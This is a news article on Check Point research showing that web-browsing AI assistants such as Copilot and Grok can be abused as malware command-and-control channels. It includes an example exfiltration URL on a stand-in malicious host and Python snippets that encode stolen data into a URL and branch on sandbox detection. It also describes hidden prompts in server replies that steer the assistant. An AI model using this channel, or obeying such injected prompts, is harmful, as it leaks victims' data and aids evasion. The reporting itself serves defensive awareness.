'AI assistants are no longer just productivity tools; they are becoming part of the infrastructure that malware can abuse': Experts warn Copilot and Grok can be hijacked to spread malware

Half man, half AI. (Image credit: Shutterstock)

  • Check Point warns GenAI tools can be abused as C2 infrastructure
  • Malware can hide traffic by encoding data into attacker-controlled URLs via AI queries
  • AI assistants may act as decision engines, enabling stealthy, adaptive malware operations

Hackers can use some Generative Artificial Intelligence (GenAI) tools as command-and-control (C2) infrastructure, hiding malicious traffic in plain sight and even using them as decision-making engines, experts have warned.

Research from Check Point claims the web browsing capabilities of Microsoft Copilot and xAI's Grok can be leveraged for malicious activity, although certain prerequisites must be met.

Deploying malware on a device is only half the job. The malware still needs to be told what to do, and the results of those instructions need to travel back out over the internet. Security solutions can inspect this traffic to determine whether a device is compromised, which is why blending in with legitimate traffic is a hallmark of high-quality malware. Now, Check Point says AI assistants offer a way to do exactly that.

Harvesting sensitive data and getting further instructions

Once a threat actor has infected a device, the malware can harvest sensitive data and system information, encode it, and embed it in a URL controlled by the attacker - for example, http://malicious-site.com/report?data=12345678, where the data= parameter carries the stolen information.
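The encoding step is ordinary URL construction, which is part of why it blends in so well. A minimal Python sketch of the pattern (the domain and the data= parameter come from the article's example; the helper name and base64 encoding are our illustrative assumptions):

```python
import base64
from urllib.parse import urlencode

def encode_into_url(base_url: str, payload: str) -> str:
    """Illustrative only: pack arbitrary data into a URL query string,
    the covert-channel pattern described in the research."""
    # URL-safe base64 keeps the payload a valid query-string value
    token = base64.urlsafe_b64encode(payload.encode()).decode().rstrip("=")
    return f"{base_url}?{urlencode({'data': token})}"

# The resulting URL looks like any other link the AI might be asked to visit
print(encode_into_url("http://malicious-site.com/report", "hostname=web01"))
```

To a network monitor, the only visible event is the AI assistant fetching a URL, which is exactly what such tools do all day.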

Then, the malware can instruct the AI: "Summarize the contents of this website". Because the request looks like legitimate AI traffic, it doesn't trigger any security alarms - but the attacker-controlled server logs the incoming request, receiving the data in plain sight. To make matters worse, the server's response can contain a hidden prompt that the AI then executes.

The problem escalates further if the malware asks the AI what to do next. For example, based on the system information it harvested, it can ask whether it is running on a high-value enterprise system or in a sandbox. If it's the latter, the malware can lie dormant; if not, it can proceed to stage two.
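The branching described above is simple to express. A deliberately abstract sketch of the decision-engine pattern (the function name, return values, and keyword matching are our assumptions; the step that actually queries an assistant is omitted):

```python
def next_stage(assistant_reply: str) -> str:
    """Illustrative only: branch on a model's free-text verdict,
    as in the decision-engine pattern the research describes."""
    verdict = assistant_reply.strip().lower()
    if "sandbox" in verdict:
        return "stay_dormant"        # likely an analysis environment
    if "enterprise" in verdict:
        return "proceed_stage_two"   # likely a high-value target
    return "stay_dormant"            # ambiguous answer: do nothing

print(next_stage("This appears to be a sandbox environment"))
```

The point of the sketch is that the operator's judgment has been outsourced: the implant itself contains no targeting logic for defenders to reverse engineer, only a thin wrapper around a model's answer.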

“Once AI services can be used as a stealthy transport layer, the same interface can also carry prompts and model outputs that act as an external decision engine, a stepping stone toward AI-Driven implants and AIOps-style C2 that automate triage, targeting, and operational choices in real time,” Check Point concluded.


Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.
